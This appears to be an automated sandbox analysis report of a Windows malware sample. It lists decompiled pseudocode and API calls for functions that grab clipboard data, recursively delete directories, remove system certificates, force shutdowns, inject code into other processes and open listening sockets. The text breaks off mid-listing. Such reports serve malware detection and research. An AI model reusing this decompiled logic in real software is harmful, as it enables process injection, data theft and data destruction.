Opcode Fuzzy Hash: 75b8e4c2b2d7933f3109896334b3120045d80d9b6f01cb261bd7d8df81ac878c
Instruction Fuzzy Hash: CF71D230C00219AACF11AFA1C841BFE7B75AF05314F1540ABF854BB2D2D77C9E859BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405EC6, Relevance: 7.6, APIs: 5, Instructions: 70
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00405EC6(void* _a4) {
				signed int _t11;
				void* _t21;
				void* _t23;
				void* _t24;
				int _t25;

				_t25 = _a4;
				_t23 = GetClipboardData(_t25);
				_a4 = _t23;
				if(E0040EEE1() == 0) {
					return _t23;
				}
				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {
					L20:
					return _a4;
				} else {
					_t21 = GlobalLock(_t23);
					if(_t21 == 0) {
						L19:
						goto L20;
					}
					_t11 = _t25 - 1;
					if(_t11 == 0) {
						_push(_t21);
						_push(0);
						L12:
						_t24 = E004165E8(_t11 | 0xffffffff);
						L15:
						if(_t24 != 0) {
							EnterCriticalSection(0x4228a8);
							E00405BC3(0x401624);
							E00405BC3(_t24);
							LeaveCriticalSection(0x4228a8);
							if(_t24 != _t21) {
								E004163A8(_t24);
							}
						}
						GlobalUnlock(_a4);
						goto L19;
					}
					_t11 = _t11 - 6;
					if(_t11 == 0) {
						_push(_t21);
						_push(1);
						goto L12;
					}
					if(_t11 != 6) {
						_t24 = _a4;
					} else {
						_t24 = _t21;
					}
					goto L15;
				}
			}

0x00405eca
0x00405ed5
0x00405ed7
0x00405ee1
0x00000000
0x00405ee3
0x00405eec
0x00405f74
0x00000000
0x00405f01
0x00405f09
0x00405f0d
0x00405f73
0x00000000
0x00405f73
0x00405f11
0x00405f12
0x00405f31
0x00405f32
0x00405f25
0x00405f2d
0x00405f39
0x00405f3b
0x00405f43
0x00405f4e
0x00405f54
0x00405f5a
0x00405f62
0x00405f65
0x00405f65
0x00405f62
0x00405f6d
0x00000000
0x00405f6d
0x00405f14
0x00405f17
0x00405f22
0x00405f23
0x00000000
0x00405f23
0x00405f1c
0x00405f36
0x00405f1e
0x00405f1e
0x00405f1e
0x00000000
0x00405f1c

APIs

GetClipboardData.USER32 ref: 00405ECF

Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9

GlobalLock.KERNEL32 ref: 00405F03
EnterCriticalSection.KERNEL32(004228A8,00000000,00000000), ref: 00405F43
LeaveCriticalSection.KERNEL32(004228A8,00000000,00401624), ref: 00405F5A
GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 00405F6D

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
String ID:
API String ID: 1109978993-0
Opcode ID: d9457119fbd82276ab49fffd48c9c19474405445a595201c8cdfe8a140313d75
Instruction ID: 3c0c88fe93c005b1b8921d48fd1901fb2157e9d1ca5dd755b989713102c23241
Opcode Fuzzy Hash: d9457119fbd82276ab49fffd48c9c19474405445a595201c8cdfe8a140313d75
Instruction Fuzzy Hash: 4911E332504A07BBCB112B299D88DAF3668DB45350B19013BF905F73E0CA7DCC429EAD

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA18, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA18(WCHAR* __ecx, void* __eflags) {
				struct _WIN32_FIND_DATAW _v596;
				short _v1116;
				WCHAR* _t38;
				void* _t42;

				_t38 = __ecx;
				if(E0041BC2F("*",  &_v1116, __ecx) == 0) {
					L9:
					SetFileAttributesW(_t38, 0x80);
					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
				}
				_t42 = FindFirstFileW( &_v1116,  &_v596);
				if(_t42 == 0xffffffff) {
					goto L9;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E0041B834( &(_v596.cFileName)) == 0 && E0041BC2F( &(_v596.cFileName),  &_v1116, _t38) != 0) {
						_t51 = _v596.dwFileAttributes & 0x00000010;
						if((_v596.dwFileAttributes & 0x00000010) == 0) {
							E0041B705( &_v1116);
						} else {
							E0041BA18( &_v1116, _t51);
						}
					}
				} while (FindNextFileW(_t42,  &_v596) != 0);
				FindClose(_t42);
				goto L9;
			}

0x0041ba26
0x0041ba3a
0x0041bab5
0x0041babb
0x0041bad2
0x0041bad2
0x0041ba4f
0x0041ba54
0x00000000
0x00000000
0x00000000
0x00000000
0x0041ba56
0x0041ba56
0x0041ba64
0x0041ba7c
0x0041ba84
0x0041ba96
0x0041ba86
0x0041ba8a
0x0041ba8a
0x0041ba84
0x0041baaa
0x0041baaf
0x00000000

APIs

Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E

FindFirstFileW.KERNEL32(?,?,?,?,?,750D46D0), ref: 0041BA49
FindNextFileW.KERNEL32(00000000,?), ref: 0041BAA4
FindClose.KERNEL32(00000000), ref: 0041BAAF
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,750D46D0), ref: 0041BABB
RemoveDirectoryW.KERNEL32(?), ref: 0041BAC2

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
String ID:
API String ID: 765042924-0
Opcode ID: e29bc09c258a5e39609c2bfe3efe158e6a4bbfbb5751287e21b14db4ba775edf
Instruction ID: d844e3a2af0b87982aab8298919512a59de90ee23d43bc9ee230f70c964b2782
Opcode Fuzzy Hash: e29bc09c258a5e39609c2bfe3efe158e6a4bbfbb5751287e21b14db4ba775edf
Instruction Fuzzy Hash: FD11AB310042096AC320EBA4DD4DBEB73ECDF85354F40862FF9A5D21A1EB78958587DE

Uniqueness

Uniqueness Score: -1.00%

Function 0041D766, Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00404B84), ref: 0041D771
CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0041D78A
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,0040F4E4), ref: 0041D795
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0041D79D
CertCloseStore.CRYPT32(00000000,00000000), ref: 0041D7A9

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
String ID:
API String ID: 1842529175-0
Opcode ID: b4e056287e8b6bcd6c01052db8080cabbd92a37fd3fb8cdc41b6b165a8cd1c4c
Instruction ID: bc84a860cf61b9e342dc502e179dbe795be430546e5662426c281594c338d1de
Opcode Fuzzy Hash: b4e056287e8b6bcd6c01052db8080cabbd92a37fd3fb8cdc41b6b165a8cd1c4c
Instruction Fuzzy Hash: 90F0E57268121167C71117256D48FF7BB6C9F82BB1B140127FD94E32A09E38C880857C

Uniqueness

Uniqueness Score: -1.00%

Function 004120CF, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004120CF(void* __ebx, void* __ecx) {
				signed int _v124;
				signed char _t12;
				unsigned int _t15;

				_t12 =  *0x422b94; // 0x0
				if((_t12 & 0x00000010) == 0) {
					__eflags = _t12 & 0x00000008;
					if(__eflags != 0) {
						E004098DC(__ebx, __ecx, __eflags);
						_t12 =  *0x422b94; // 0x0
					}
					__eflags = _t12 & 0x00000003;
					if((_t12 & 0x00000003) == 0) {
						__eflags = _t12 & 0x00000004;
						if((_t12 & 0x00000004) != 0) {
							goto L8;
						}
						goto L9;
					} else {
						E00417A74(L"SeShutdownPrivilege");
						_t15 =  *0x422b94; // 0x0
						__eflags = 0;
						__imp__InitiateSystemShutdownExW(0, 0, 0, 1, _t15 >> 0x00000001 & 0x00000001, 0x80000000);
						return 0;
					}
				} else {
					_t12 = E00413F4A( &_v124);
					if(_t12 != 0) {
						_v124 = _v124 | 0x00000020;
						 *0x422b98 =  *0x422b98 | 0x00000010;
						E00413FA2( &_v124);
						L8:
						return ExitWindowsEx(0x14, 0x80000000);
					}
					L9:
					return _t12;
				}
			}

0x004120d2
0x004120dc
0x00412101
0x00412103
0x00412105
0x0041210a
0x0041210a
0x0041210f
0x00412111
0x0041213c
0x0041213e
0x00000000
0x00000000
0x00000000
0x00412113
0x00412118
0x0041211d
0x0041212f
0x00412134
0x0041213b
0x0041213b
0x004120de
0x004120e2
0x004120e9
0x004120eb
0x004120ef
0x004120fa
0x00412140
0x00000000
0x00412147
0x0041214e
0x0041214e
0x0041214e

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 00412134

Part of subcall function 00413F4A: CreateMutexW.KERNEL32(00422BD0,00000000,00423148,?,?,00413D59,?,?,?,743C152E,00000002), ref: 00413F70

ExitWindowsEx.USER32(00000014,80000000), ref: 00412147

Strings

, xrefs: 004120EB
SeShutdownPrivilege, xrefs: 00412113

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateExitInitiateMutexShutdownSystemWindows
String ID: $SeShutdownPrivilege
API String ID: 3829579691-2253681161
Opcode ID: 3616fc0272bce4acf371547f81cb90875d0a51c363d754f4b559825dd47428c9
Instruction ID: 9f8ef0cc0cf88bbbc013522f64a228bd4d838c3b7983664f83a6514e82aab31a
Opcode Fuzzy Hash: 3616fc0272bce4acf371547f81cb90875d0a51c363d754f4b559825dd47428c9
Instruction Fuzzy Hash: 0CF08B3160025479FE24EF749F06BEA3B6C8B01748F540026EA95E2173D6A995928B2C

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD03, Relevance: 6.1, APIs: 4, Instructions: 94
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041AD03(void* __eax, void* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				void* _t37;
				void* _t42;
				intOrPtr* _t43;
				int _t44;
				long _t46;
				void* _t47;
				SIZE_T* _t48;
				signed int _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				unsigned int _t64;

				_t55 = __eax;
				_t1 = _t55 + 0x3c; // 0xd8
				_t60 =  *_t1 + __eax;
				_t46 =  *(_t60 + 0x50);
				_v24 = _t46;
				_v5 = 0;
				if(IsBadReadPtr(__eax, _t46) == 0) {
					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
					_v12 = _t37;
					__eflags = _t37;
					if(__eflags == 0) {
						L17:
						return _v12;
					}
					_t47 = E004163FB(__eflags, _t55, _t46);
					_t48 = 0;
					__eflags = _t47;
					if(_t47 == 0) {
						L16:
						VirtualFreeEx(_a4, _v12, 0, 0x8000);
						_t32 =  &_v12;
						 *_t32 = _v12 & 0x00000000;
						__eflags =  *_t32;
						goto L17;
					}
					__eflags =  *(_t60 + 0xa4);
					if( *(_t60 + 0xa4) <= 0) {
						L15:
						E004163A8(_t47);
						__eflags = _v5;
						if(_v5 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t42 =  *(_t60 + 0xa0);
					__eflags = _t42;
					if(_t42 <= 0) {
						goto L15;
					}
					_t61 =  *((intOrPtr*)(_t60 + 0x34));
					_t54 = _v12 - _t61;
					_v20 = _t55 - _t61;
					_t43 = _t42 + _t47;
					while(1) {
						__eflags =  *_t43 - _t48;
						if( *_t43 == _t48) {
							break;
						}
						_t62 =  *((intOrPtr*)(_t43 + 4));
						__eflags = _t62 - 8;
						if(_t62 < 8) {
							L12:
							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
							_t48 = 0;
							__eflags = 0;
							continue;
						}
						_t64 = _t62 + 0xfffffff8 >> 1;
						__eflags = _t64;
						_v16 = _t48;
						if(_t64 == 0) {
							goto L12;
						} else {
							goto L9;
						}
						do {
							L9:
							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
							__eflags = _t50;
							if(_t50 != 0) {
								_t52 = (_t50 & 0x00000fff) +  *_t43;
								_t19 = _t52 + _t47;
								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
								__eflags =  *_t19;
							}
							_v16 = _v16 + 1;
							__eflags = _v16 - _t64;
						} while (_v16 < _t64);
						goto L12;
					}
					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
					__eflags = _t44;
					_t28 =  &_v5;
					 *_t28 = _t44 != 0;
					__eflags =  *_t28;
					goto L15;
				}
				return 0;
			}

0x0041ad0c
0x0041ad0e
0x0041ad11
0x0041ad13
0x0041ad18
0x0041ad1b
0x0041ad27
0x0041ad3d
0x0041ad43
0x0041ad46
0x0041ad48
0x0041adfe
0x00000000
0x0041adfe
0x0041ad55
0x0041ad57
0x0041ad59
0x0041ad5b
0x0041ade7
0x0041adf4
0x0041adfa
0x0041adfa
0x0041adfa
0x00000000
0x0041adfa
0x0041ad61
0x0041ad67
0x0041addb
0x0041addc
0x0041ade1
0x0041ade5
0x00000000
0x00000000
0x00000000
0x0041ade5
0x0041ad69
0x0041ad6f
0x0041ad71
0x00000000
0x00000000
0x0041ad73
0x0041ad7b
0x0041ad7d
0x0041ad80
0x0041adc0
0x0041adc0
0x0041adc2
0x00000000
0x00000000
0x0041ad84
0x0041ad87
0x0041ad8a
0x0041adbb
0x0041adbb
0x0041adbe
0x0041adbe
0x00000000
0x0041adbe
0x0041ad8f
0x0041ad8f
0x0041ad91
0x0041ad94
0x00000000
0x00000000
0x00000000
0x00000000
0x0041ad96
0x0041ad96
0x0041ad99
0x0041ad9e
0x0041ada1
0x0041ada9
0x0041adb0
0x0041adb0
0x0041adb0
0x0041adb0
0x0041adb3
0x0041adb6
0x0041adb6
0x00000000
0x0041ad96
0x0041adcf
0x0041add5
0x0041add7
0x0041add7
0x0041add7
0x00000000
0x0041add7
0x00000000

APIs

IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 0041AD1F
VirtualAllocEx.KERNEL32(74B5F560,00000000,?,00003000,00000040,?,74B5F560,00000000), ref: 0041AD3D
WriteProcessMemory.KERNEL32(74B5F560,74B5F560,00000000,00400000,00000000,00400000,?,?,74B5F560,00000000), ref: 0041ADCF
VirtualFreeEx.KERNEL32(74B5F560,74B5F560,00000000,00008000,00400000,?,?,74B5F560,00000000), ref: 0041ADF4

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Virtual$AllocFreeMemoryProcessReadWrite
String ID:
API String ID: 1273498236-0
Opcode ID: a5611ddfb37f94985a099c83305b8f10012e03d75221c0046daa0072a3f7f8cb
Instruction ID: 402d3be93969db2a5c4ddcbfbada0398a8ed50ac041230525ca6a3eda3c02996
Opcode Fuzzy Hash: a5611ddfb37f94985a099c83305b8f10012e03d75221c0046daa0072a3f7f8cb
Instruction Fuzzy Hash: D431F571A01609AFCF108F64CD80BEFBBB6EF05706F05406AE501B7690C7749D91CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00417A1D, Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417A1D(intOrPtr _a4) {
				intOrPtr _v20;
				void* _v32;
				signed int _t6;
				signed int _t7;
				int _t9;
				int _t14;
				void* _t15;

				_t14 = 0;
				_t6 = CreateToolhelp32Snapshot(4, 0);
				_t15 = _t6;
				_t7 = _t6 | 0xffffffff;
				if(_t15 != _t7) {
					_v32 = 0x1c;
					_t9 = Thread32First(_t15,  &_v32);
					while(_t9 != 0) {
						if(_v20 == _a4) {
							_t14 = _t14 + 1;
						}
						_t9 = Thread32Next(_t15,  &_v32);
					}
					CloseHandle(_t15);
					return _t14;
				}
				return _t7;
			}

0x00417a25
0x00417a2a
0x00417a30
0x00417a32
0x00417a37
0x00417a3e
0x00417a45
0x00417a61
0x00417a53
0x00417a55
0x00417a55
0x00417a5b
0x00417a5b
0x00417a66
0x00000000
0x00417a6c
0x00417a71

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00417A2A
Thread32First.KERNEL32 ref: 00417A45
Thread32Next.KERNEL32 ref: 00417A5B
CloseHandle.KERNEL32(00000000), ref: 00417A66

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3643885135-0
Opcode ID: e8da23ea6f3dd5439e73b56ca6e084f1f8b3f236189e2dcef25cf17983a97b46
Instruction ID: 126fd09709233bea9ca4c72564499b8517d1fd1a8f9831c905bc5730e1b2e491
Opcode Fuzzy Hash: e8da23ea6f3dd5439e73b56ca6e084f1f8b3f236189e2dcef25cf17983a97b46
Instruction Fuzzy Hash: 60F08972504115ABD720AF65DC48DEF7BBCEF85790F000126FA12E2290D7389A85C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 004194EA, Relevance: 6.0, APIs: 4, Instructions: 32networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 004194F3
bind.WS2_32(00000000,?,-0000001D), ref: 00419513
listen.WS2_32(00000000,?), ref: 00419522
closesocket.WS2_32(00000000), ref: 0041952D

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: bindclosesocketlistensocket
String ID:
API String ID: 952684215-0
Opcode ID: f78e8057b0f8f6fcbd244b8fe884aa12aa9d100737b826f61c904a8310dc2137
Instruction ID: 8a23dee8ff56d4025e5a9d097799e3dbd364c74613bbe6c8b332c128f9503776
Opcode Fuzzy Hash: f78e8057b0f8f6fcbd244b8fe884aa12aa9d100737b826f61c904a8310dc2137
Instruction Fuzzy Hash: 8CF0A73220010076D2211F39ED09A6F2AAA9BC17B0B040729F462E61E0E73888C2C524

Uniqueness

Uniqueness Score: -1.00%

Function 004197C8, Relevance: 4.5, APIs: 3, Instructions: 27networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 004197D1
bind.WS2_32(00000000,00000017,-0000001D), ref: 004197F1
closesocket.WS2_32(00000000), ref: 004197FC

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: bindclosesocketsocket
String ID:
API String ID: 1873677229-0
Opcode ID: 44e594ebd3cfd45e0fa7b2e8d7497f330a8ee7e756eec3927565abca3bc1a630
Instruction ID: 62ab5973d68b1c46eea08d67a9270810fe4c09f3c6fccd014d350a6e7704d334
Opcode Fuzzy Hash: 44e594ebd3cfd45e0fa7b2e8d7497f330a8ee7e756eec3927565abca3bc1a630
Instruction Fuzzy Hash: A6E0483220051076D3202B39AD4EA6F25A99BC67717190725F572D71E1E77888C29134

Uniqueness

Uniqueness Score: -1.00%

Function 0040E447, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040E447(char* __esi) {
				void* _v40;
				short _v46;
				signed char _v48;
				struct _OSVERSIONINFOW _v324;
				void* _t13;
				int _t16;
				signed int _t20;
				short _t24;
				char* _t25;

				_t25 = __esi;
				E0041645B(_t13, __esi, 0, 6);
				_v324.dwOSVersionInfoSize = 0x11c;
				_t16 = GetVersionExW( &_v324);
				if(_t16 != 0) {
					__imp__GetNativeSystemInfo( &_v40);
					 *__esi = E0040E371();
					if(_v48 > 0xff || _v46 != 0) {
						_t20 = 0;
					} else {
						_t20 = _v48 & 0x000000ff;
					}
					 *(_t25 + 1) = _t20;
					asm("sbb eax, eax");
					 *((short*)(_t25 + 2)) =  !0xffff & _v324.dwBuildNumber;
					_t24 = _v40;
					 *((short*)(_t25 + 4)) = _t24;
					return _t24;
				}
				return _t16;
			}

0x0040e447
0x0040e455
0x0040e461
0x0040e46b
0x0040e473
0x0040e479
0x0040e484
0x0040e48f
0x0040e49e
0x0040e498
0x0040e498
0x0040e498
0x0040e4a0
0x0040e4ae
0x0040e4b8
0x0040e4bc
0x0040e4c0
0x00000000
0x0040e4c0
0x0040e4c5

APIs

GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 0040E46B
GetNativeSystemInfo.KERNEL32(?), ref: 0040E479

Part of subcall function 0040E371: GetVersionExW.KERNEL32(?,74B04EE0), ref: 0040E390

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Version$InfoNativeSystem
String ID:
API String ID: 2518960133-0
Opcode ID: f5ad80b17dd0358bfdef3a09cde0315c682f7347bc322d753d5a595c3ef14ec3
Instruction ID: 8a81b1511fa57e1e60e569e877bf74d9cb5d6e193c674df31d3aab02e37b4a5e
Opcode Fuzzy Hash: f5ad80b17dd0358bfdef3a09cde0315c682f7347bc322d753d5a595c3ef14ec3
Instruction Fuzzy Hash: 210162349002498ADB31DBA6C901BEDB7F4AF08704F0488BAD558F36D1E778DA84DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004164AA, Relevance: 3.0, APIs: 2, Instructions: 15
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004164AA() {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;

				GetSystemTime( &_v28);
				SystemTimeToFileTime( &_v28,  &_v12);
				return E00416508( &_v12);
			}

0x004164b4
0x004164c2
0x004164d1

APIs

GetSystemTime.KERNEL32(?,?,?,00404F5A), ref: 004164B4
SystemTimeToFileTime.KERNEL32(?,?,?,?,00404F5A), ref: 004164C2

Part of subcall function 00416508: __aulldiv.LIBCMT ref: 00416521

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$System$File__aulldiv
String ID:
API String ID: 1459046340-0
Opcode ID: 79ced9a304a9af190eca9eb9d40e32a8b959a0ae06c7582295d629f1b2a79997
Instruction ID: dace9a1fb8ff21888bbbf00d3cdf3f47af4135df61ce7d57ed4e77e2204f6748
Opcode Fuzzy Hash: 79ced9a304a9af190eca9eb9d40e32a8b959a0ae06c7582295d629f1b2a79997
Instruction Fuzzy Hash: F3D09E7580010EABCF04EFE4D94ACDE7BBCAA08309F400461A201E2051EA34E2468BD4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A86D, Relevance: 1.7, APIs: 1, Instructions: 179
comCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040A86D() {
				signed int _v5;
				void* _v12;
				signed short* _v16;
				char _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				char _v40;
				char _v56;
				void* _v260;
				char _v356;
				char _v460;
				void* __edi;
				void* __esi;
				char* _t52;
				void* _t53;
				void* _t55;
				void* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr* _t79;
				intOrPtr* _t84;
				intOrPtr* _t86;
				void* _t87;
				signed short* _t88;
				intOrPtr _t96;
				signed int _t113;
				intOrPtr* _t117;
				char* _t119;
				char* _t121;

				_t52 =  &_v32;
				_v32 = 0;
				__imp__CoCreateInstance(0x4015e0, 0, 0x4401, 0x4015c0, _t52);
				if(_t52 != 0) {
					L3:
					_v16 = 0;
					_t117 = 0;
					L4:
					if(_t117 == 0) {
						return _t52;
					}
					_t53 = 0x39;
					E0040FA33(_t53,  &_v56);
					_t121 =  &_v40;
					_t55 = 0x3a;
					E0040FA33(_t55, _t121);
					_push(_t121);
					_push( &_v56);
					_push(_t117);
					_v20 = 0;
					if( *((intOrPtr*)( *_t117 + 0xc))() != 0) {
						L31:
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_push(0xcc);
						return E004099E1(_t114, _v20, 0x38);
					}
					_push( &_v12);
					_push(_t117);
					if( *((intOrPtr*)( *_t117 + 0x20))() != 0) {
						goto L31;
					}
					_t65 = 0x3b;
					E0040FA33(_t65,  &_v356);
					_t67 = _v12;
					 *((intOrPtr*)( *_t67 + 0xc))(_t67);
					_t69 = _v12;
					_push(_t69);
					if( *((intOrPtr*)( *_t69 + 0x10))() != 0) {
						L30:
						_t71 = _v12;
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						goto L31;
					}
					_t96 = 0x64;
					do {
						_t73 = _v12;
						_t114 =  &_v28;
						_push( &_v28);
						_push(_t73);
						if( *((intOrPtr*)( *_t73 + 0x14))() != 0) {
							goto L28;
						}
						_t77 = _v28;
						_t114 =  &_v24;
						_push( &_v24);
						_push(0x4015d0);
						_push(_t77);
						if( *((intOrPtr*)( *_t77))() != 0) {
							L27:
							_t79 = _v28;
							 *((intOrPtr*)( *_t79 + 8))(_t79);
							goto L28;
						}
						_v5 = 1;
						while(1) {
							_push(_v5 & 0x000000ff);
							_push( &_v356);
							_t114 = 0x34;
							_t119 =  &_v460;
							if(E0041709B( &_v356, _t114, _t119) <= 0) {
								break;
							}
							_t86 = _v24;
							_t114 = _t119;
							_v36 = _t96;
							_t87 =  *((intOrPtr*)( *_t86 + 0xc))(_t86, _t119, 0,  &_v260, _t96,  &_v36);
							if(_t87 != 0) {
								if(_t87 == 0x7a || _t87 == 1) {
									L25:
									_v5 = _v5 + 1;
									if(_v5 <= _t96) {
										continue;
									}
								}
								break;
							}
							_t88 =  &_v260;
							if(_v260 == 0) {
								L18:
								if( *_t88 != 0x40) {
									_t88 = 0;
								}
								L20:
								if(_t88 != 0 && E0041679C( &_v260 | 0xffffffff,  &_v20,  &_v260) != 0) {
									E0041679C(1,  &_v20, 0x40323c);
								}
								goto L25;
							}
							_t113 = _v260 & 0x0000ffff;
							while(_t113 != 0x40) {
								_t88 =  &(_t88[1]);
								_t113 =  *_t88 & 0x0000ffff;
								if(_t113 != 0) {
									continue;
								}
								goto L18;
							}
							goto L20;
						}
						_t84 = _v24;
						 *((intOrPtr*)( *_t84 + 8))(_t84);
						goto L27;
						L28:
						_t75 = _v12;
						_push(_t75);
					} while ( *((intOrPtr*)( *_t75 + 0x10))() == 0);
					_t117 = _v16;
					goto L30;
				}
				_t117 = _v32;
				if(_t117 == 0) {
					goto L3;
				} else {
					_v16 = _t117;
					goto L4;
				}
			}

0x0040a879
0x0040a88f
0x0040a892
0x0040a89a
0x0040a8a8
0x0040a8a8
0x0040a8ab
0x0040a8ad
0x0040a8af
0x0040aa52
0x0040aa52
0x0040a8ba
0x0040a8bb
0x0040a8c2
0x0040a8c5
0x0040a8c6
0x0040a8cf
0x0040a8d3
0x0040a8d4
0x0040a8d5
0x0040a8dd
0x0040aa38
0x0040aa3b
0x0040aa41
0x00000000
0x0040aa49
0x0040a8e8
0x0040a8e9
0x0040a8ef
0x00000000
0x00000000
0x0040a8fd
0x0040a8fe
0x0040a903
0x0040a909
0x0040a90c
0x0040a911
0x0040a917
